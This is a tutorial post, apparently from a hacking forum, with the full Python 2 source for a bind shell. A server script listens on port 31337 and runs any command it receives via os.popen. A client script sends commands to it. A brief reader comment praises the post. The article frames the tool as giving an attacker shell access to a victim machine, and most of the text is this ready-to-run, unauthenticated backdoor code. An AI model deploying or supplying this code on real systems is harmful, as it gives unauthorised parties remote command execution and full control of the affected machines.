“Bind shell” is a term often used for a program or piece of shellcode that binds to a specific port on a machine and lets other machines (i.e. the attacker) connect and execute shell commands on the victim machine. In this article we'll look at a basic implementation of a bind shell and its client, written in Python.

The Code

The code is split across two files, server.py and client.py.

Server

The server.py program simply listens on the specified port (default: 31337) and provides “shell” access to the machines that connect.

Code:

#!/usr/bin/env python
# Server (Python 2 syntax)

import sys
import socket
import os

host = ''    # empty string: listen on every interface
SIZE = 512   # maximum number of bytes read per command

try:
    port = int(sys.argv[1])   # bind() needs an integer port
except (IndexError, ValueError):
    port = 31337

try:
    sockfd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error, e:
    print "Error in creating socket : ", e
    sys.exit(1)

sockfd.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)

try:
    sockfd.bind((host, port))
except socket.error, e:
    print "Error in Binding : ", e
    sys.exit(1)

print("\n\n======================================================")
print("-------- Server Listening on Port %d --------------" % port)
print("======================================================\n\n")

try:
    while 1:
        # listen for connections
        sockfd.listen(1)
        clientsock, clientaddr = sockfd.accept()
        print("\n\nGot Connection from " + str(clientaddr))
        while 1:
            try:
                cmd = clientsock.recv(SIZE)
            except socket.error:
                break
            print(cmd)

            if not cmd or cmd == 'g2g':
                # client went away or asked to quit:
                # close the connection and move on to others
                print("\n-----------Connection Closed----------------")
                clientsock.close()
                break

            # run the received text as a shell command and collect its output
            pipe = os.popen(cmd)
            rawOutput = pipe.readlines()

            try:
                output = ""
                # Parse the output from list to string
                for data in rawOutput:
                    output = output + data
                clientsock.send("Command Output :- \n" + output + "\r\n")
            except socket.error, e:
                print("\n-----------Connection Closed--------")
                clientsock.close()
                break
except KeyboardInterrupt:
    print("\n\n>>>> Server Terminated <<<<<\n")

print("===========================================================")
print("\tThanks for using Simple-CMD")
print("\tEmail : lionaneesh@gmail.com")
print("============================================================")

Client

The client.py program connects to the server and sends the commands to be executed.

Code:

#!/usr/bin/env python
# Simple network client (Python 2 syntax)

import socket
import sys

port = 31337   # The port to connect to is hardcoded; if you change it, change it on the server too
SIZE = 1000    # maximum number of bytes read per reply

try:
    host = sys.argv[1]
except IndexError:
    # Use localhost as the server if no host is provided
    host = "127.0.0.1"

try:
    sockfd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error, e:
    print "Error while Creating socket : ", e
    sys.exit(1)

try:
    sockfd.connect((host, port))
except socket.gaierror, e:
    print "Error (Address-Related) while Connecting to server : ", e
    sys.exit(1)
except socket.error, e:
    print "Error while Connecting to Server : ", e
    sys.exit(1)

# We are connected now , Start the real shit!

print("=============================================================")
print("\tSimple-CMD\tC0d3d by : 1i0n4n33sh")
print("=============================================================")
print("\t\tEmail : lionaneesh@gmail.com")
print("=============================================================")
print("\tC0d3 f0r InDi4 , H4(k F0r 1nDi4 , Liv3 f0r 1nDi4")
print("=============================================================")

try:
    while 1:
        cmd = raw_input("\n\n(simple-cmd) $ ")
        sockfd.send(cmd)
        result = sockfd.recv(SIZE).strip()
        if not len(result):
            # empty reply: the server closed the connection
            sockfd.close()
            break
        print(result)
except KeyboardInterrupt:
    # clean up code
    sockfd.shutdown(0)
    print("\n\n-------- Client Terminated ----------\n")

print("\n==================================================")
print("\tThanks for using Simple-CMD")
print("\tEmail : lionaneesh@gmail.com")
print("====================================================\n\n")

That's it for this article; stay tuned for more.
This is really good, I think I wouldn't do it as good as you man! It looks pretty similar to the way I wrote it in C++ a long time ago. Really awesome tutorial! Keep it goin'